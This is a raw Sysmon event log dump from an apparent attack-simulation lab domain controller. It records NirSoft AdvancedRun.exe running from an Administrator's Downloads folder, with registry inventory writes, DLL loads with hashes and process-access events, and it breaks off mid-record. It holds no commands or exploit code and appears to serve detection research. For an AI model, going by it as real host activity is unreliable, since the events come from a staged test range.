(0x00000000-0x14613300)NT AUTHORITY\SYSTEM 13241300x80000000000000002926119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LanguageDWORD (0x00000409)NT AUTHORITY\SYSTEM 13241300x80000000000000002926118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\SizeQWORD (0x00000000-0x0002a178)NT AUTHORITY\SYSTEM 13241300x80000000000000002926117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\AppxPackageRelativeId(Empty)NT AUTHORITY\SYSTEM 13241300x80000000000000002926116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\AppxPackageFullName(Empty)NT AUTHORITY\SYSTEM 13241300x80000000000000002926115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinProductVersion1.5.0.13NT AUTHORITY\SYSTEM 13241300x80000000000000002926114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LinkDate11/22/2021 09:28:48NT AUTHORITY\SYSTEM 13241300x80000000000000002926113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProductVersion1.50NT AUTHORITY\SYSTEM 13241300x80000000000000002926112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProductNameadvancedrunNT AUTHORITY\SYSTEM 13241300x80000000000000002926111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinaryTypepe64_amd64NT AUTHORITY\SYSTEM 13241300x80000000000000002926110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\BinFileVersion1.5.0.13NT AUTHORITY\SYSTEM 13241300x80000000000000002926109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\Version1.50NT AUTHORITY\SYSTEM 13241300x80000000000000002926108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\PublishernirsoftNT AUTHORITY\SYSTEM 13241300x80000000000000002926107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\OriginalFileNameadvancedrun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\NameAdvancedRun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LongPathHashadvancedrun.exe|da2ad31d568bac4NT AUTHORITY\SYSTEM 13241300x80000000000000002926104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\LowerCaseLongPathc:\users\administrator\downloads\advancedrun-x64\advancedrun.exeNT AUTHORITY\SYSTEM 13241300x80000000000000002926103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\FileId00001c742086aebb17ba409f9f2510560c2dcde6d45aNT AUTHORITY\SYSTEM 13241300x80000000000000002926102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\ProgramId0006a2b5cbd9a8f44e2a129f3d44e765e36a00000904NT AUTHORITY\SYSTEM 12241200x80000000000000002926101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4NT AUTHORITY\SYSTEM 13241300x80000000000000002926086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.153{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeBinary DataNT AUTHORITY\SYSTEM 534500x80000000000000002926049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:34.153{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeATTACKRANGE\Administrator 11241100x80000000000000002926048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:34.144{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.cfg2022-01-20 21:40:34.144ATTACKRANGE\Administrator 10341000x80000000000000002926000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.211{834264DD-0DC0-61E7-ED00-000000002402}46444776C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c9e8|C:\Windows\System32\TwinUI.dll+75fcd|C:\Windows\System32\TwinUI.dll+75ba3|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46441688C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.203{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.183{834264DD-0DBF-61E7-E700-000000002402}42324352C:\Windows\system32\taskhostw.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.183{834264DD-0DBF-61E7-E700-000000002402}42324352C:\Windows\system32\taskhostw.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000002925980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.970{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=5F9B6C9B05956273CC91C5E70B2456EE,SHA256=F51014AC7DD24D56F5C22D8EB33DC1385C0A0A038C510B974BDE6068B5F335F9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.959{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.827{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000002925901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002925897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.840{834264DD-0AB0-61E7-1600-000000002402}12923060C:\Windows\system32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 